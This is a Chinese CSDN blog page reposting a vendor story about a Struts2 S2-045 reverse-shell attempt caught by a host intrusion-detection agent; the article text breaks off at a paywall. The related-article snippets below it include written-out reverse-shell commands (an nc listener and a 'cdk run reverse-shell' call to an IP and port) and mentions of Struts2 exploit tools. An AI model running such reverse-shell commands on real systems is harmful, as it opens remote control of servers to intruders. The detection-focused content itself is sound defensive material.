Struts2漏洞导致的反弹shell——青藤云安全使用的是agent进程采集器进行检测

最新推荐文章于 2024-01-10 09:39:28 发布
最新推荐文章于 2024-01-10 09:39:28 发布
阅读量1k 收藏 2
点赞数
文章标签: shell java 操作系统
原文链接:http://www.cnblogs.com/bonelee/p/11225586.html
版权
本文讲述了在Struts2 S2-045漏洞爆发后,如何通过青藤云安全的Agent实时监控进程行为,发现并防御黑客通过反弹shell的攻击。黑客试图利用Struts2的Web框架漏洞,但被及时发现并采取了封堵IP、打补丁等措施,防止了服务器受到损害。
摘要由CSDN通过智能技术生成

安全老司机 | Struts2漏洞爆发后,与黑客的一次正面交锋

 备注:

青藤云安全:——用的是进程信息采集器

通过对用户进程行为的实时监控,结合行为分析,及时发现非法shell连接引起的反弹shell行为,可以有效地感知0Day漏洞利用的行为痕迹,可以提供反向shell的详细过程操作树。

青藤云安全将Agent安装在服务器上,根据客户业务运行状况设立数万个监测指标,对文件进程、主机访问、业务关系等建立多维度、多层次的纵深检测体系,可以无间断对入侵行为进行监控,实现实时的入侵检测和快速响应,一旦发现异常情况,进行毫秒级报警

青藤新一代主机入侵检测系统的“反弹shell”功能,可以通过对用户进程行为进行实时监控,结合异常行为识别,可及时发现进程中非法 Shell 连接操作产生的反弹 Shell行为,能有效感知“0Day”漏洞等利用的行为痕迹,并提供反弹 Shell 的详细进程树。

 

 

故事开始

“我们可能被黑客攻击了!!!”接到客户急匆匆的一个电话。

我赶紧打开电脑查看报警邮件,提示存在一个反弹Shell的攻击行为。

这大半夜,客户的服务器居然正在主动尝试连接外部其它服务器。在那个瞬间,我都能想象得出来,服务器另一端那个穿着“黑衣服”的人&

最低0.47元/天 解锁文章
djph26741
关注
Struts2-052复现,并反弹Shell
Becktick的博客
03-31 1288
Struts2-052复现,并反弹Shell 技术无罪,请勿用于恶意用途 转载请注明出处! 测试机:kali linux,win10 工具:burp 靶机:cenOS7 测试机IP:192.168.213.136 靶机IP:192.168.213.138 环境: docker 一. 环境搭建 docker搭建可以参考这位小姐姐的文章: http://bbs.dark5.net/?thread-24...
反序列化报错回显、反弹shell
weixin_30485799的博客
01-04 631
使用java.net.URLClassLoader类,远程加载自定义类(放在自己服务器上的jar包),可以自定义方法执行。 • 在自定义类中,抛出异常,使其成功随着Jboss报错返回命令执行结果。 首先得通过代码执行将ErrorBaseExec写到服务器上。 package me.lightless.shiro; import java.io.BufferedReader; i...
Docker反弹shell
Fly_鹏程万里
12-27 2054
文章前言 本篇文章我们主要介绍一些在Docker中反弹shell到远程服务器的方法 常见方法 Step 1:在远程服务器端监听端口 nc -lnvp 9999 Step 2:通过CDK反弹shell #命令格式 cdk run reverse-shell <ip>:<port> #使用实例 cdk run reverse-shell 192.168.17.143:9999 Step 3:成功获取到shell 其他技巧 我们还可以使用反引号...
青藤主机自适应平台Agent安装手册.pdf
03-29
青藤云安装说明书
青藤云waf简介
focus on security
03-14 1892
系统默认提供 200 多条防护规则,单个负载均衡器支持最大配置防护规则 200 条、域名数量 100 个,覆盖30 余类通用 Web 攻击特征, 能够有效防御 SQL 注入、XSS 跨站脚本、Webshell 上传、命令注入、非法 HTTP 协议请求等常见 Web 攻击。 可基于请求字段细粒度检测 CC 攻击,支持请求速率和请求集中度双重算法检测,能够有效应对 CC 慢速攻击, 识别人机访问...
全网最全Struts 2 全版本漏洞检测工具,最新struts漏洞更新
04-18
这个标题提到的是一个全面的Struts 2漏洞检测工具,旨在帮助开发者和安全专家识别并修复Struts 2框架中的各种安全漏洞。 Struts 2的安全问题主要源于其OGNL(Object-Graph Navigation Language)表达式语言的使用,...
Struts2漏洞检查工具Struts2.2019.V2.3
01-25
"Struts2漏洞检查工具Struts2.2019.V2.3"是一个专门针对这些漏洞进行检测的工具,旨在帮助开发者和网络安全专业人员识别并修复Struts2框架中的安全问题。 Struts2的安全漏洞主要包括以下几类: 1. OGNL(Object-...
Struts2漏洞检测工具2018最新版
10-10
Struts2漏洞检测工具,支持S2-057 CVE-2018-11776 、S2-048 CVE-2017-9791、S2-046 CVE-2017-5638、S2-045 CVE-2017-5638、S2-037 CVE-2016-4438、 S2-032 CVE-2016-3081 、S2-020 CVE-2014-0094 、S2-019 CVE-2013-...
Struts2漏洞利用工具-可用于检测
08-01
Struts2是一款流行的Java Web框架,它为开发者提供了一种构建MVC(Model-View-Controller...定期进行安全评估,使用像“Struts2漏洞利用工具”这样的资源,以及遵循最佳安全实践,可以帮助保护系统免受潜在的恶意攻击。
青藤云安全-容器安全指南及解决方案.pdf
08-09
青藤云安全-容器安全指南及解决方案.pdf
从0到1浅析Redis服务器反弹Shell那些事
道阻且长,行则将至。
12-29 2513
本文学习了 Redis 服务的作用,并本地搭建了 Redis 服务,同时介绍了其相关基础使用方法和核心安全配置。然后总结分析了 Redis 未授权访问漏洞或弱口令导致 Redis 服务被攻击者操控后,如何进一步通过反弹 Shell 接管服务器。
青藤云安全防护安装
liu876049930的博客
06-21 3287
青云 安全防护
Struts2远程代码执行漏洞
m0_63241485的博客
08-16 945
进入试验机,打开火狐终端firefox访问我们的靶机所在ip地址。通过whoami与id命令,对当前反弹shell的权限进行判断,这里为linux系统最高权限root用户权限.在Linux操作系统中,root的权限是最高的,也被称为超级权限的拥有者。普通用户无法执行的操作,root用户都能完成,所以也被称之为超级管理用户。在所有Linux系统中,系统都是通过UID来区分用户权限级别的,而UID为0的用户被系统约定为是具有超级权限。...
反弹shell方法汇总
最新发布
2301_76786857的博客
01-10 1833
reverse shell反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
UBUNTU腾讯云云监控卸载
slxbb的专栏
06-28 665
systemctl stop tat_agent systemctl disable tat_agent /usr/local/qcloud/stargate/admin/uninstall.sh /usr/local/qcloud/YunJing/uninst.sh /usr/local/qcloud/monitor/barad/admin/uninstall.sh rm -f /etc/systemd/system/tat_agent.service rm -rf /usr/local/qcloud r
Apache Struts2 S2-005 远程代码执行漏洞
m0_63241485的博客
08-20 1544
XWork会将GET参数的键和值利用OGNL表达式解析成Java语句,如:user.address.city=Bishkek&user[‘favoriteDrink’]=kumys//会被转化成触发漏洞就是利用了这个点,再配合OGNL的沙盒绕过方法,组成了S2-003。官方对003的修复方法是增加了安全模式(沙盒),S2-005在OGNL表达式中将安全模式关闭,又绕过了修复方法。整体过程如下:S2-003 使用\u0023绕过s2对#的防御S2-003 后官方增加了安全模式(沙盒)
渗透测试-struts2攻防环境搭建拿shell
lza20001103的博客
04-14 2027
渗透测试之struts2攻防环境搭建
领跑最后一公里 青藤云安全自适应架构了解一下?
cuikaoji4979的博客
07-11 953
随着互联网技术的快速发展,网络早已成为企业不可或缺的一部分,灰黑产业也因此不断向网络侧靠拢,各大网络安全事故频有发生。各企业用户也因此引起了一定的恐慌,大家对于网络安全的认知也有了一个新的高度。   而网络安...
struts2漏洞反弹shell
08-23
Struts2漏洞反弹shell是指通过利用Struts2框架的漏洞,成功将命令执行的结果反弹到攻击者的机器上。首先,黑客需要找到存在漏洞Struts2版本。通过使用资产清点工具,可以对服务器上运行的资产进行全面了解,发现是否存在Struts2的Web框架,并查找对应的漏洞。 一旦找到存在漏洞Struts2版本,黑客可以构造并提交payload来利用该漏洞。构造的payload中包含恶意命令,当服务器执行该命令时,恶意命令的结果将被反弹到黑客的机器上。 反弹shell的目的是为了获取对目标服务器的控制权。通过反弹shell,黑客可以在目标服务器上执行任意命令,获取敏感信息或者进行其他恶意操作。反弹shell的实现方法有多种,其中一种方法是使用python监听本地开启的http服务,并在攻击时开启监听。当成功接收到反弹shell后,黑客可以在控制台上执行命令来控制目标服务器。 需要注意的是,反弹shell是一种攻击行为,严重违反法律法规。为了保护服务器的安全,建议管理员及时更新和修复存在漏洞的组件,并加强网络安全防护措施,以避免被黑客利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [Struts2远程代码执行漏洞](https://blog.csdn.net/m0_63241485/article/details/126372808)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [Struts2漏洞导致反弹shell——青藤云安全使用的是agent进程采集器进行检测](https://blog.csdn.net/djph26741/article/details/101520632)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值